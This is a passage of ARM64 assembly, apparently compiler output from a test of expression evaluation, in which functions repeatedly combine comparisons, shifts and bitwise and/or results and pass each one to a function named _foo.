orr w0, w8, w9
bl _foo
ldr w8, [sp, #40] ; 4-byte Folded Reload
ldr w9, [sp, #44] ; 4-byte Folded Reload
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, gt
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldr w8, [sp, #40] ; 4-byte Folded Reload
ldr w9, [sp, #44] ; 4-byte Folded Reload
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldr w8, [sp, #40] ; 4-byte Folded Reload
ldr w9, [sp, #44] ; 4-byte Folded Reload
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, ne
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldr w8, [sp, #40] ; 4-byte Folded Reload
ldr w9, [sp, #44] ; 4-byte Folded Reload
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, le
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldr w8, [sp, #40] ; 4-byte Folded Reload
ldr w9, [sp, #44] ; 4-byte Folded Reload
ldur w10, [x29, #-16]
subs w9, w9, w10
cset w9, ge
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldr w8, [sp, #40] ; 4-byte Folded Reload
ldur w9, [x29, #-16]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldr w0, [sp, #36] ; 4-byte Folded Reload
bl _foo
ldr w0, [sp, #40] ; 4-byte Folded Reload
bl _foo
ldr w0, [sp, #40] ; 4-byte Folded Reload
bl _foo
ldr w0, [sp, #44] ; 4-byte Folded Reload
bl _foo
ldur w8, [x29, #-12]
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w8, [x29, #-12]
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, lt
and w8, w8, #0x1
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w8, [x29, #-12]
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, gt
and w8, w8, #0x1
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w8, [x29, #-12]
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w8, [x29, #-12]
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, ne
and w8, w8, #0x1
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w8, [x29, #-12]
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, le
and w8, w8, #0x1
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w8, [x29, #-12]
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, ge
and w8, w8, #0x1
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w8, [x29, #-12]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #48] ; 4-byte Folded Spill
tbnz w8, #0, LBB0_10
b LBB0_9
LBB0_9:
ldur w8, [x29, #-16]
subs w8, w8, #0
cset w8, ne
str w8, [sp, #48] ; 4-byte Folded Spill
b LBB0_10
LBB0_10:
ldr w8, [sp, #48] ; 4-byte Folded Reload
and w8, w8, #0x1
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w8, [x29, #-12]
subs w8, w8, #0
cset w8, ne
mov w9, #1
str w9, [sp, #32] ; 4-byte Folded Spill
tbnz w8, #0, LBB0_12
b LBB0_11
LBB0_11:
ldur w8, [x29, #-16]
subs w8, w8, #0
cset w8, ne
str w8, [sp, #32] ; 4-byte Folded Spill
b LBB0_12
LBB0_12:
ldr w8, [sp, #32] ; 4-byte Folded Reload
and w8, w8, #0x1
ldur w9, [x29, #-8]
mov w10, #0
str w10, [sp, #20] ; 4-byte Folded Spill
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w8, [x29, #-12]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w8, [x29, #-12]
ldur w9, [x29, #-8]
ands w8, w8, w9
cset w8, eq
and w0, w8, #0x1
bl _foo
ldur w8, [x29, #-12]
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w9, w8, #0x1
mov w8, #2
str w8, [sp, #16] ; 4-byte Folded Spill
and w0, w8, w9
bl _foo
ldr w8, [sp, #16] ; 4-byte Folded Reload
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, lt
and w8, w8, #0x1
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldr w8, [sp, #16] ; 4-byte Folded Reload
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, gt
and w8, w8, #0x1
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldr w8, [sp, #16] ; 4-byte Folded Reload
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldr w8, [sp, #16] ; 4-byte Folded Reload
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, ne
and w8, w8, #0x1
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldr w8, [sp, #16] ; 4-byte Folded Reload
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, le
and w8, w8, #0x1
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldr w8, [sp, #16] ; 4-byte Folded Reload
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, ge
and w8, w8, #0x1
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w8, [x29, #-16]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w9, w8, #0x1
mov w8, #1
str w8, [sp, #24] ; 4-byte Folded Spill
and w0, w8, w9
bl _foo
ldr w8, [sp, #20] ; 4-byte Folded Reload
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldr w8, [sp, #16] ; 4-byte Folded Reload
ldur w9, [x29, #-8]
ands w8, w8, w9
cset w8, eq
and w0, w8, #0x1
bl _foo
ldr w8, [sp, #16] ; 4-byte Folded Reload
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldr w0, [sp, #20] ; 4-byte Folded Reload
bl _foo
ldr w8, [sp, #16] ; 4-byte Folded Reload
ldr w9, [sp, #20] ; 4-byte Folded Reload
ldur w10, [x29, #-16]
subs w8, w8, w10
cset w8, lt
and w8, w8, #0x1
and w0, w8, w9
bl _foo
ldr w8, [sp, #16] ; 4-byte Folded Reload
ldr w9, [sp, #20] ; 4-byte Folded Reload
ldur w10, [x29, #-16]
subs w8, w8, w10
cset w8, gt
and w8, w8, #0x1
and w0, w8, w9
bl _foo
ldr w8, [sp, #16] ; 4-byte Folded Reload
ldr w9, [sp, #20] ; 4-byte Folded Reload
ldur w10, [x29, #-16]
subs w8, w8, w10
cset w8, eq
and w8, w8, #0x1
and w0, w8, w9
bl _foo
ldr w8, [sp, #16] ; 4-byte Folded Reload
ldr w9, [sp, #20] ; 4-byte Folded Reload
ldur w10, [x29, #-16]
subs w8, w8, w10
cset w8, ne
and w8, w8, #0x1
and w0, w8, w9
bl _foo
ldr w8, [sp, #16] ; 4-byte Folded Reload
ldr w9, [sp, #20] ; 4-byte Folded Reload
ldur w10, [x29, #-16]
subs w8, w8, w10
cset w8, le
and w8, w8, #0x1
and w0, w8, w9
bl _foo
ldr w8, [sp, #16] ; 4-byte Folded Reload
ldr w9, [sp, #20] ; 4-byte Folded Reload
ldur w10, [x29, #-16]
subs w8, w8, w10
cset w8, ge
and w8, w8, #0x1
and w0, w8, w9
bl _foo
ldr w9, [sp, #20] ; 4-byte Folded Reload
ldur w8, [x29, #-16]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
and w0, w8, w9
bl _foo
ldr w0, [sp, #20] ; 4-byte Folded Reload
bl _foo
ldr w0, [sp, #20] ; 4-byte Folded Reload
bl _foo
ldr w0, [sp, #24] ; 4-byte Folded Reload
bl _foo
ldur w8, [x29, #-12]
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-12]
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, lt
and w8, w8, #0x1
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-12]
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, gt
and w8, w8, #0x1
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-12]
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-12]
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, ne
and w8, w8, #0x1
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-12]
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, le
and w8, w8, #0x1
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-12]
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, ge
and w8, w8, #0x1
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-12]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #28] ; 4-byte Folded Spill
tbnz w8, #0, LBB0_14
b LBB0_13
LBB0_13:
ldur w8, [x29, #-16]
subs w8, w8, #0
cset w8, ne
str w8, [sp, #28] ; 4-byte Folded Spill
b LBB0_14
LBB0_14:
ldr w8, [sp, #28] ; 4-byte Folded Reload
and w8, w8, #0x1
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-12]
subs w8, w8, #0
cset w8, ne
mov w9, #1
str w9, [sp, #12] ; 4-byte Folded Spill
tbnz w8, #0, LBB0_16
b LBB0_15
LBB0_15:
ldur w8, [x29, #-16]
subs w8, w8, #0
cset w8, ne
str w8, [sp, #12] ; 4-byte Folded Spill
b LBB0_16
LBB0_16:
ldr w8, [sp, #12] ; 4-byte Folded Reload
and w8, w8, #0x1
ldur w9, [x29, #-8]
mov w10, #0
str w10, [sp, #4] ; 4-byte Folded Spill
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-12]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-12]
ldur w9, [x29, #-8]
orr w8, w8, w9
subs w8, w8, #0
cset w8, eq
and w0, w8, #0x1
bl _foo
ldur w8, [x29, #-12]
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w9, w8, #0x1
mov w8, #2
str w8, [sp, #8] ; 4-byte Folded Spill
orr w0, w8, w9
bl _foo
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, lt
and w8, w8, #0x1
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, gt
and w8, w8, #0x1
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, ne
and w8, w8, #0x1
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, le
and w8, w8, #0x1
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, ge
and w8, w8, #0x1
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-16]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w9, w8, #0x1
mov w8, #1
str w8, [sp] ; 4-byte Folded Spill
orr w0, w8, w9
bl _foo
ldr w8, [sp, #4] ; 4-byte Folded Reload
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldur w9, [x29, #-8]
orr w8, w8, w9
subs w8, w8, #0
cset w8, eq
and w0, w8, #0x1
bl _foo
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldr w0, [sp, #8] ; 4-byte Folded Reload
bl _foo
ldr w9, [sp, #4] ; 4-byte Folded Reload
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldur w10, [x29, #-16]
subs w8, w8, w10
cset w8, lt
and w8, w8, #0x1
orr w0, w8, w9
bl _foo
ldr w9, [sp, #4] ; 4-byte Folded Reload
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldur w10, [x29, #-16]
subs w8, w8, w10
cset w8, gt
and w8, w8, #0x1
orr w0, w8, w9
bl _foo
ldr w9, [sp, #4] ; 4-byte Folded Reload
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldur w10, [x29, #-16]
subs w8, w8, w10
cset w8, eq
and w8, w8, #0x1
orr w0, w8, w9
bl _foo
ldr w9, [sp, #4] ; 4-byte Folded Reload
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldur w10, [x29, #-16]
subs w8, w8, w10
cset w8, ne
and w8, w8, #0x1
orr w0, w8, w9
bl _foo
ldr w9, [sp, #4] ; 4-byte Folded Reload
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldur w10, [x29, #-16]
subs w8, w8, w10
cset w8, le
and w8, w8, #0x1
orr w0, w8, w9
bl _foo
ldr w9, [sp, #4] ; 4-byte Folded Reload
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldur w10, [x29, #-16]
subs w8, w8, w10
cset w8, ge
and w8, w8, #0x1
orr w0, w8, w9
bl _foo
ldr w9, [sp, #4] ; 4-byte Folded Reload
ldur w8, [x29, #-16]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
orr w0, w8, w9
bl _foo
ldr w0, [sp] ; 4-byte Folded Reload
bl _foo
ldr w0, [sp, #4] ; 4-byte Folded Reload
bl _foo
ldr w0, [sp, #4] ; 4-byte Folded Reload
bl _foo
ldr w0, [sp, #8] ; 4-byte Folded Reload
bl _foo
ldur w0, [x29, #-4]
ldp x29, x30, [sp, #112] ; 16-byte Folded Reload
add sp, sp, #128
ret
.cfi_endproc
; -- End function
.globl _baz ; -- Begin function baz
.p2align 2
_baz: ; @baz
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur w0, [x29, #-8]
stur w1, [x29, #-12]
str w2, [sp, #16]
ldur w8, [x29, #-8]
mov w9, #0
str w9, [sp, #12] ; 4-byte Folded Spill
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-12]
ldr w10, [sp, #16]
lsl w9, w9, w10
and w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-12]
ldr w10, [sp, #16]
asr w9, w9, w10
and w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-12]
ldr w10, [sp, #16]
add w9, w9, w10
and w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-12]
ldr w10, [sp, #16]
subs w9, w9, w10
and w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldr w9, [sp, #16]
stur w9, [x29, #-12]
and w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-12]
bic w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-12]
ldr w10, [sp, #16]
and w9, w9, w10
and w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-12]
ldr w10, [sp, #16]
orr w9, w9, w10
and w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
mov w9, #2
str w9, [sp, #8] ; 4-byte Folded Spill
and w0, w8, #0x2
bl _foo
ldr w9, [sp, #8] ; 4-byte Folded Reload
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldr w10, [sp, #16]
lsl w9, w9, w10
and w0, w8, w9
bl _foo
ldr w9, [sp, #8] ; 4-byte Folded Reload
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldr w10, [sp, #16]
asr w9, w9, w10
and w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldr w9, [sp, #16]
add w9, w9, #2
and w0, w8, w9
bl _foo
ldr w9, [sp, #8] ; 4-byte Folded Reload
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldr w10, [sp, #16]
subs w9, w9, w10
and w0, w8, w9
bl _foo
ldr w9, [sp, #8] ; 4-byte Folded Reload
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
str w9, [sp, #16]
and w0, w8, #0x2
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
mov w9, #-3
str w9, [sp, #4] ; 4-byte Folded Spill
and w0, w8, #0xfffffffd
bl _foo
ldr w9, [sp, #8] ; 4-byte Folded Reload
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldr w10, [sp, #16]
and w9, w9, w10
and w0, w8, w9
bl _foo
ldr w9, [sp, #8] ; 4-byte Folded Reload
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldr w10, [sp, #16]
orr w9, w9, w10
and w0, w8, w9
bl _foo
ldr w9, [sp, #8] ; 4-byte Folded Reload
ldr w8, [sp, #12] ; 4-byte Folded Reload
ldr w10, [sp, #16]
lsl w9, w9, w10
and w0, w8, w9
bl _foo
ldr w9, [sp, #8] ; 4-byte Folded Reload
ldr w8, [sp, #12] ; 4-byte Folded Reload
ldr w10, [sp, #16]
asr w9, w9, w10
and w0, w8, w9
bl _foo
ldr w8, [sp, #12] ; 4-byte Folded Reload
ldr w9, [sp, #16]
add w9, w9, #2
and w0, w8, w9
bl _foo
ldr w9, [sp, #8] ; 4-byte Folded Reload
ldr w8, [sp, #12] ; 4-byte Folded Reload
ldr w10, [sp, #16]
subs w9, w9, w10
and w0, w8, w9
bl _foo
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldr w0, [sp, #12] ; 4-byte Folded Reload
str w8, [sp, #16]
bl _foo
ldr w0, [sp, #12] ; 4-byte Folded Reload
bl _foo
ldr w9, [sp, #8] ; 4-byte Folded Reload
ldr w8, [sp, #12] ; 4-byte Folded Reload
ldr w10, [sp, #16]
and w9, w9, w10
and w0, w8, w9
bl _foo
ldr w9, [sp, #8] ; 4-byte Folded Reload
ldr w8, [sp, #12] ; 4-byte Folded Reload
ldr w10, [sp, #16]
orr w9, w9, w10
and w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-12]
ldr w10, [sp, #16]
lsl w9, w9, w10
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-12]
ldr w10, [sp, #16]
asr w9, w9, w10
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-12]
ldr w10, [sp, #16]
add w9, w9, w10
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-12]
ldr w10, [sp, #16]
subs w9, w9, w10
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldr w9, [sp, #16]
stur w9, [x29, #-12]
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-12]
orn w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-12]
ldr w10, [sp, #16]
and w9, w9, w10
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldur w9, [x29, #-12]
ldr w10, [sp, #16]
orr w9, w9, w10
orr w0, w8, w9
bl _foo
ldr w9, [sp, #8] ; 4-byte Folded Reload
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldr w10, [sp, #16]
lsl w9, w9, w10
orr w0, w8, w9
bl _foo
ldr w9, [sp, #8] ; 4-byte Folded Reload
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldr w10, [sp, #16]
asr w9, w9, w10
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldr w9, [sp, #16]
add w9, w9, #2
orr w0, w8, w9
bl _foo
ldr w9, [sp, #8] ; 4-byte Folded Reload
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldr w10, [sp, #16]
subs w9, w9, w10
orr w0, w8, w9
bl _foo
ldr w9, [sp, #8] ; 4-byte Folded Reload
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
str w9, [sp, #16]
orr w0, w8, #0x2
bl _foo
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
orr w0, w8, #0xfffffffd
bl _foo
ldr w9, [sp, #8] ; 4-byte Folded Reload
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldr w10, [sp, #16]
and w9, w9, w10
orr w0, w8, w9
bl _foo
ldr w9, [sp, #8] ; 4-byte Folded Reload
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldr w10, [sp, #16]
orr w9, w9, w10
orr w0, w8, w9
bl _foo
ldr w9, [sp, #8] ; 4-byte Folded Reload
ldr w8, [sp, #12] ; 4-byte Folded Reload
ldr w10, [sp, #16]
lsl w9, w9, w10
orr w0, w8, w9
bl _foo
ldr w9, [sp, #8] ; 4-byte Folded Reload
ldr w8, [sp, #12] ; 4-byte Folded Reload
ldr w10, [sp, #16]
asr w9, w9, w10
orr w0, w8, w9
bl _foo
ldr w8, [sp, #12] ; 4-byte Folded Reload
ldr w9, [sp, #16]
add w9, w9, #2
orr w0, w8, w9
bl _foo
ldr w9, [sp, #8] ; 4-byte Folded Reload
ldr w8, [sp, #12] ; 4-byte Folded Reload
ldr w10, [sp, #16]
subs w9, w9, w10
orr w0, w8, w9
bl _foo
ldr w0, [sp, #8] ; 4-byte Folded Reload
str w0, [sp, #16]
bl _foo
ldr w0, [sp, #4] ; 4-byte Folded Reload
bl _foo
ldr w9, [sp, #8] ; 4-byte Folded Reload
ldr w8, [sp, #12] ; 4-byte Folded Reload
ldr w10, [sp, #16]
and w9, w9, w10
orr w0, w8, w9
bl _foo
ldr w9, [sp, #8] ; 4-byte Folded Reload
ldr w8, [sp, #12] ; 4-byte Folded Reload
ldr w10, [sp, #16]
orr w9, w9, w10
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-12]
ldr w9, [sp, #16]
lsl w8, w8, w9
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w8, [x29, #-12]
ldr w9, [sp, #16]
asr w8, w8, w9
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w8, [x29, #-12]
ldr w9, [sp, #16]
add w8, w8, w9
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w8, [x29, #-12]
ldr w9, [sp, #16]
subs w8, w8, w9
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldr w8, [sp, #16]
stur w8, [x29, #-12]
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w9, [x29, #-12]
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
bic w0, w8, w9
bl _foo
ldur w8, [x29, #-12]
ldr w9, [sp, #16]
and w8, w8, w9
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldur w8, [x29, #-12]
ldr w9, [sp, #16]
orr w8, w8, w9
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldr w9, [sp, #16]
lsl w8, w8, w9
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldr w9, [sp, #16]
asr w8, w8, w9
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldr w8, [sp, #16]
add w8, w8, #2
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldr w9, [sp, #16]
subs w8, w8, w9
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldr w8, [sp, #8] ; 4-byte Folded Reload
str w8, [sp, #16]
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
